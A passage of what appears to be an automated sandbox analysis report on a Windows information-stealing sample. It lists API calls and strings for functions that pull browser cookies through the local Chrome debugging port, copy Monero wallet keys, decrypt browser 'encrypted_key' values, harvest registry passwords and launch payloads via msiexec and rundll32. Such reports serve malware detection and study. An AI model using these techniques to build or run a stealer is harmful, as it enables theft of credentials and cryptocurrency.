                            • ShellExecuteEx.SHELL32(0000003C), ref: 000E35AD
                            • ShellExecuteEx.SHELL32(0000003C), ref: 000E373A
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1739272411.00000000000D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                            • Associated: 00000000.00000002.1739246388.00000000000D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.00000000000FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.000000000020D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.0000000000219000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.000000000023E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.00000000003A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.00000000003BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000544000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000620000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000642000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000649000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743063334.0000000000659000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743548320.00000000007F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743617264.00000000007F8000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: ExecuteShell$lstrcpy
                            • String ID: /i "$ /passive$"" $.dll$.msi$<$C:\Windows\system32\msiexec.exe$C:\Windows\system32\rundll32.exe
                            • API String ID: 2507796910-3625054190
                            • Opcode ID: c138bcec4473fb35cc9d2c8a718deaafa960cbbee46c951ff238affe2a4d7072
                            • Instruction ID: 7cdf5a772622c177ca9f9052a0b58b71638e5f4bc9e056d448d7a2f8e2169553
                            • Opcode Fuzzy Hash: c138bcec4473fb35cc9d2c8a718deaafa960cbbee46c951ff238affe2a4d7072
                            • Instruction Fuzzy Hash: 5C120C71E101489ECB15EBA1DDA2FEEB739AF29300F114599E10676193EF343B49CB62
                            Function 000D9BE0 Relevance: 19.6, APIs: 8, Strings: 5, Instructions: 146stringCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 000D9A50: InternetOpenA.WININET(000F0AF6,00000001,00000000,00000000,00000000), ref: 000D9A6A
                            • lstrcat.KERNEL32(?,cookies), ref: 000D9CAF
                            • lstrcat.KERNEL32(?,000F12C4), ref: 000D9CC1
                            • lstrcat.KERNEL32(?,?), ref: 000D9CD5
                            • lstrcat.KERNEL32(?,000F12C8), ref: 000D9CE7
                            • lstrcat.KERNEL32(?,?), ref: 000D9CFB
                            • lstrcat.KERNEL32(?,.txt), ref: 000D9D0D
                            • lstrlen.KERNEL32(00000000), ref: 000D9D17
                            • lstrlen.KERNEL32(00000000), ref: 000D9D26
                              • Part of subcall function 000EAA50: lstrcpy.KERNEL32(000F0E1A,00000000), ref: 000EAA98
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1739272411.00000000000D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                            • Associated: 00000000.00000002.1739246388.00000000000D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.00000000000FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.000000000020D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.0000000000219000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.000000000023E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.00000000003A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.00000000003BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000544000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000620000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000642000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000649000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743063334.0000000000659000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743548320.00000000007F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743617264.00000000007F8000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcat$lstrlen$InternetOpenlstrcpy
                            • String ID: .txt$/devtools$cookies$localhost$ws://localhost:9229
                            • API String ID: 3174675846-3542011879
                            • Opcode ID: 0e1dfe65da137517b8448fdf7e06b65bb4faaa8cfa6a4383f3de5444cdf6e1e0
                            • Instruction ID: fc8e1f0620334fc0d953176736dd6256ebef0b2a967cf54f8f213d2ea0c51978
                            • Opcode Fuzzy Hash: 0e1dfe65da137517b8448fdf7e06b65bb4faaa8cfa6a4383f3de5444cdf6e1e0
                            • Instruction Fuzzy Hash: 86517E72910608ABDB14EBE0DC95FEE773CAF55301F408658F20AA7191EF74AA49CF61
                            Function 000E5510 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 139stringCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 000EAAB0: lstrcpy.KERNEL32(?,00000000), ref: 000EAAF6
                              • Part of subcall function 000D62D0: InternetOpenA.WININET(000F0DFF,00000001,00000000,00000000,00000000), ref: 000D6331
                              • Part of subcall function 000D62D0: StrCmpCA.SHLWAPI(?,00D4E898), ref: 000D6353
                              • Part of subcall function 000D62D0: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 000D6385
                              • Part of subcall function 000D62D0: HttpOpenRequestA.WININET(00000000,GET,?,00D4DE70,00000000,00000000,00400100,00000000), ref: 000D63D5
                              • Part of subcall function 000D62D0: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 000D640F
                              • Part of subcall function 000D62D0: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 000D6421
                              • Part of subcall function 000EABB0: lstrcpy.KERNEL32(?,000F0E1A), ref: 000EAC15
                            • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 000E5568
                            • lstrlen.KERNEL32(00000000), ref: 000E557F
                              • Part of subcall function 000E8FC0: LocalAlloc.KERNEL32(00000040,-00000001), ref: 000E8FE2
                            • StrStrA.SHLWAPI(00000000,00000000), ref: 000E55B4
                            • lstrlen.KERNEL32(00000000), ref: 000E55D3
                            • lstrlen.KERNEL32(00000000), ref: 000E55FE
                              • Part of subcall function 000EAA50: lstrcpy.KERNEL32(000F0E1A,00000000), ref: 000EAA98
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1739272411.00000000000D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                            • Associated: 00000000.00000002.1739246388.00000000000D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.00000000000FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.000000000020D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.0000000000219000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.000000000023E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.00000000003A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.00000000003BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000544000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000620000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000642000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000649000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743063334.0000000000659000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743548320.00000000007F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743617264.00000000007F8000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Internetlstrcpylstrlen$HttpOpenRequest$AllocConnectLocalOptionSend
                            • String ID: ERROR$ERROR$ERROR$ERROR$ERROR
                            • API String ID: 3240024479-1526165396
                            • Opcode ID: cb5fe60a3edf44f71ba6e680d7ec93ae3b089cd4b5b3c1da57f1ec2052b041d3
                            • Instruction ID: 658c836a152d2b369487f4fd332a7bba4b3c0a049f8e31cdd3231eb34a6ba3d9
                            • Opcode Fuzzy Hash: cb5fe60a3edf44f71ba6e680d7ec93ae3b089cd4b5b3c1da57f1ec2052b041d3
                            • Instruction Fuzzy Hash: 22510930A10188EFCB14EF61DDA6AED7779AF25341F514468E50A6B593EF307B04CB62
                            Function 000E1520 Relevance: 16.8, APIs: 11, Instructions: 310COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000000.00000002.1739272411.00000000000D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                            • Associated: 00000000.00000002.1739246388.00000000000D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.00000000000FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.000000000020D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.0000000000219000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.000000000023E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.00000000003A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.00000000003BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000544000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000620000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000642000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000649000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743063334.0000000000659000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743548320.00000000007F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743617264.00000000007F8000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpylstrlen
                            • String ID:
                            • API String ID: 2001356338-0
                            • Opcode ID: b5e4161cf329b9c91233966ce2a39f923ce5a78d16681ba4a6dbf802c79e5814
                            • Instruction ID: 2c9069aa70d155de4b15661bee40fcd0c4b40c8719c61676e050d42bf1eff04c
                            • Opcode Fuzzy Hash: b5e4161cf329b9c91233966ce2a39f923ce5a78d16681ba4a6dbf802c79e5814
                            • Instruction Fuzzy Hash: 0EC192B5E001199FCB14EF60DC99FEE7379AF58304F004599E509A7283EB70AA85CF91
                            Function 000E44D0 Relevance: 16.7, APIs: 11, Instructions: 204stringCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 000E8F70: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 000E8F9B
                            • lstrcat.KERNEL32(?,00000000), ref: 000E453C
                            • lstrcat.KERNEL32(?,00D4E488), ref: 000E455B
                            • lstrcat.KERNEL32(?,?), ref: 000E456F
                            • lstrcat.KERNEL32(?,00D4CEA0), ref: 000E4583
                              • Part of subcall function 000EAA50: lstrcpy.KERNEL32(000F0E1A,00000000), ref: 000EAA98
                              • Part of subcall function 000E8F20: GetFileAttributesA.KERNEL32(00000000,?,000D1B94,?,?,000F577C,?,?,000F0E22), ref: 000E8F2F
                              • Part of subcall function 000DA430: StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 000DA489
                              • Part of subcall function 000DA110: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 000DA13C
                              • Part of subcall function 000DA110: GetFileSizeEx.KERNEL32(000000FF,?), ref: 000DA161
                              • Part of subcall function 000DA110: LocalAlloc.KERNEL32(00000040,?), ref: 000DA181
                              • Part of subcall function 000DA110: ReadFile.KERNEL32(000000FF,?,00000000,000D148F,00000000), ref: 000DA1AA
                              • Part of subcall function 000DA110: LocalFree.KERNEL32(000D148F), ref: 000DA1E0
                              • Part of subcall function 000DA110: CloseHandle.KERNEL32(000000FF), ref: 000DA1EA
                              • Part of subcall function 000E9550: GlobalAlloc.KERNEL32(00000000,000E462D,000E462D), ref: 000E9563
                            • StrStrA.SHLWAPI(?,00D4E608), ref: 000E4643
                            • GlobalFree.KERNEL32(?), ref: 000E4762
                              • Part of subcall function 000DA210: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,>O,00000000,00000000), ref: 000DA23F
                              • Part of subcall function 000DA210: LocalAlloc.KERNEL32(00000040,?,?,?,000D4F3E,00000000,?), ref: 000DA251
                              • Part of subcall function 000DA210: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,>O,00000000,00000000), ref: 000DA27A
                              • Part of subcall function 000DA210: LocalFree.KERNEL32(?,?,?,?,000D4F3E,00000000,?), ref: 000DA28F
                            • lstrcat.KERNEL32(?,00000000), ref: 000E46F3
                            • StrCmpCA.SHLWAPI(?,000F08D2), ref: 000E4710
                            • lstrcat.KERNEL32(00000000,00000000), ref: 000E4722
                            • lstrcat.KERNEL32(00000000,?), ref: 000E4735
                            • lstrcat.KERNEL32(00000000,000F0FA0), ref: 000E4744
                            Memory Dump Source
                            • Source File: 00000000.00000002.1739272411.00000000000D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                            • Associated: 00000000.00000002.1739246388.00000000000D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.00000000000FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.000000000020D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.0000000000219000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.000000000023E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.00000000003A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.00000000003BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000544000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000620000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000642000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000649000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743063334.0000000000659000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743548320.00000000007F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743617264.00000000007F8000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcat$FileLocal$AllocFree$BinaryCryptGlobalString$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
                            • String ID:
                            • API String ID: 3541710228-0
                            • Opcode ID: d4876d60b170a035bded73a04eff749c15862262cae004b41f98bf916567f82a
                            • Instruction ID: b58a005627666683c98bf83e98bce05a69db524326888cedbba4857e8bc4ae46
                            • Opcode Fuzzy Hash: d4876d60b170a035bded73a04eff749c15862262cae004b41f98bf916567f82a
                            • Instruction Fuzzy Hash: 827149B6E00208ABDB14EBA0DD95FDE777DAB89300F048598F60567152EB35EB44CF51
                            Function 000D1310 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 141stringfileCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 000D12A0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 000D12B4
                              • Part of subcall function 000D12A0: RtlAllocateHeap.NTDLL(00000000), ref: 000D12BB
                              • Part of subcall function 000D12A0: RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 000D12D7
                              • Part of subcall function 000D12A0: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 000D12F5
                              • Part of subcall function 000D12A0: RegCloseKey.ADVAPI32(?), ref: 000D12FF
                            • lstrcat.KERNEL32(?,00000000), ref: 000D134F
                            • lstrlen.KERNEL32(?), ref: 000D135C
                            • lstrcat.KERNEL32(?,.keys), ref: 000D1377
                              • Part of subcall function 000EAA50: lstrcpy.KERNEL32(000F0E1A,00000000), ref: 000EAA98
                              • Part of subcall function 000EACC0: lstrlen.KERNEL32(?,00D49238,?,\Monero\wallet.keys,000F0E1A), ref: 000EACD5
                              • Part of subcall function 000EACC0: lstrcpy.KERNEL32(00000000), ref: 000EAD14
                              • Part of subcall function 000EACC0: lstrcat.KERNEL32(00000000,00000000), ref: 000EAD22
                              • Part of subcall function 000EABB0: lstrcpy.KERNEL32(?,000F0E1A), ref: 000EAC15
                              • Part of subcall function 000E8CF0: GetSystemTime.KERNEL32(000F0E1B,00D4A870,000F05B6,?,?,000D13F9,?,0000001A,000F0E1B,00000000,?,00D49238,?,\Monero\wallet.keys,000F0E1A), ref: 000E8D16
                              • Part of subcall function 000EAC30: lstrcpy.KERNEL32(00000000,?), ref: 000EAC82
                              • Part of subcall function 000EAC30: lstrcat.KERNEL32(00000000), ref: 000EAC92
                            • CopyFileA.KERNEL32(?,00000000,00000001), ref: 000D1465
                              • Part of subcall function 000EAAB0: lstrcpy.KERNEL32(?,00000000), ref: 000EAAF6
                              • Part of subcall function 000DA110: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 000DA13C
                              • Part of subcall function 000DA110: GetFileSizeEx.KERNEL32(000000FF,?), ref: 000DA161
                              • Part of subcall function 000DA110: LocalAlloc.KERNEL32(00000040,?), ref: 000DA181
                              • Part of subcall function 000DA110: ReadFile.KERNEL32(000000FF,?,00000000,000D148F,00000000), ref: 000DA1AA
                              • Part of subcall function 000DA110: LocalFree.KERNEL32(000D148F), ref: 000DA1E0
                              • Part of subcall function 000DA110: CloseHandle.KERNEL32(000000FF), ref: 000DA1EA
                            • DeleteFileA.KERNEL32(00000000), ref: 000D14EF
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1739272411.00000000000D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                            • Associated: 00000000.00000002.1739246388.00000000000D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.00000000000FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.000000000020D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.0000000000219000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.000000000023E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.00000000003A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.00000000003BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000544000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000620000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000642000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000649000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743063334.0000000000659000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743548320.00000000007F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743617264.00000000007F8000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Filelstrcpy$lstrcat$CloseHeapLocallstrlen$AllocAllocateCopyCreateDeleteFreeHandleOpenProcessQueryReadSizeSystemTimeValue
                            • String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
                            • API String ID: 3478931302-218353709
                            • Opcode ID: 3c4b9fa9c004ceed5c85f996a6f449c230e082b888cfc2ac79ecbc17f9483058
                            • Instruction ID: 422fa59cf3285c0baa24084b885b7d14ab5e62cdf1951097bd66f7f7b515cb48
                            • Opcode Fuzzy Hash: 3c4b9fa9c004ceed5c85f996a6f449c230e082b888cfc2ac79ecbc17f9483058
                            • Instruction Fuzzy Hash: 825121B1E502589BCB15EB60DDA2EED737C9F55300F4045E8B60A76093EF306B89CB66
                            Function 000D9A50 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 107networkCOMMON
                            Download Yara Rule
                            APIs
                            • InternetOpenA.WININET(000F0AF6,00000001,00000000,00000000,00000000), ref: 000D9A6A
                            • InternetOpenUrlA.WININET(00000000,http://localhost:9229/json,00000000,00000000,80000000,00000000), ref: 000D9AAB
                            • InternetCloseHandle.WININET(00000000), ref: 000D9AC7
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1739272411.00000000000D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                            • Associated: 00000000.00000002.1739246388.00000000000D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.00000000000FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.000000000020D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.0000000000219000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.000000000023E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.00000000003A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.00000000003BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000544000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000620000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000642000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000649000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743063334.0000000000659000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743548320.00000000007F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743617264.00000000007F8000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Internet$Open$CloseHandle
                            • String ID: "webSocketDebuggerUrl":$"ws://$http://localhost:9229/json
                            • API String ID: 3289985339-2144369209
                            • Opcode ID: b52295321e2dc06a18fe83443e245ab0cb88bc508d6ab5a9a5821cc104d9e55e
                            • Instruction ID: 5cf4f71b3958a0cfde94a9ad28f2e02bd7e84c66c9b5646e531c1ca207f3653f
                            • Opcode Fuzzy Hash: b52295321e2dc06a18fe83443e245ab0cb88bc508d6ab5a9a5821cc104d9e55e
                            • Instruction Fuzzy Hash: 3E412D35A10258EFCB54EBA4CD95FED77B8AB48740F104156F609BA291DBB0AE80CB60
                            Function 000D7630 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 91stringCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 000D7330: memset.MSVCRT ref: 000D7374
                              • Part of subcall function 000D7330: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 000D739A
                              • Part of subcall function 000D7330: RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 000D7411
                              • Part of subcall function 000D7330: StrStrA.SHLWAPI(00000000,Password,00000000), ref: 000D746D
                              • Part of subcall function 000D7330: GetProcessHeap.KERNEL32(00000000,?), ref: 000D74B2
                              • Part of subcall function 000D7330: HeapFree.KERNEL32(00000000), ref: 000D74B9
                            • lstrcat.KERNEL32(00000000,000F192C), ref: 000D7666
                            • lstrcat.KERNEL32(00000000,00000000), ref: 000D76A8
                            • lstrcat.KERNEL32(00000000, : ), ref: 000D76BA
                            • lstrcat.KERNEL32(00000000,00000000), ref: 000D76EF
                            • lstrcat.KERNEL32(00000000,000F1934), ref: 000D7700
                            • lstrcat.KERNEL32(00000000,00000000), ref: 000D7733
                            • lstrcat.KERNEL32(00000000,000F1938), ref: 000D774D
                            • task.LIBCPMTD ref: 000D775B
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.1739272411.00000000000D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000D0000, based on PE: true
                            • Associated: 00000000.00000002.1739246388.00000000000D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.00000000000FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.000000000020D000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.0000000000219000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.000000000023E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739272411.00000000003A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.00000000003BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000544000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000620000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000642000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000649000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1739784378.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743063334.0000000000659000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743548320.00000000007F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.1743617264.00000000007F8000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcat$Heap$EnumFreeOpenProcessValuememsettask
                            • String ID: :
                            • API String ID: 3191641157-3653984579
                            • Opcode ID: 49095b3893ccc2cc65b8d846453cd898339fc1c7a05d3c2870a082086d73feab
                            • Instruction ID: 27b319eb7766d444e765c02b10bcb8e1473c7271276858ce51e798ec1580366a
                            • Opcode Fuzzy Hash: 49095b3893ccc2cc65b8d846453cd898339fc1c7a05d3c2870a082086d73feab
                            • Instruction Fuzzy Hash: D7318075A08209EBDB09EBA0DC95DFF737CAB45300F104509F106A73A1DB34A94ACBA0
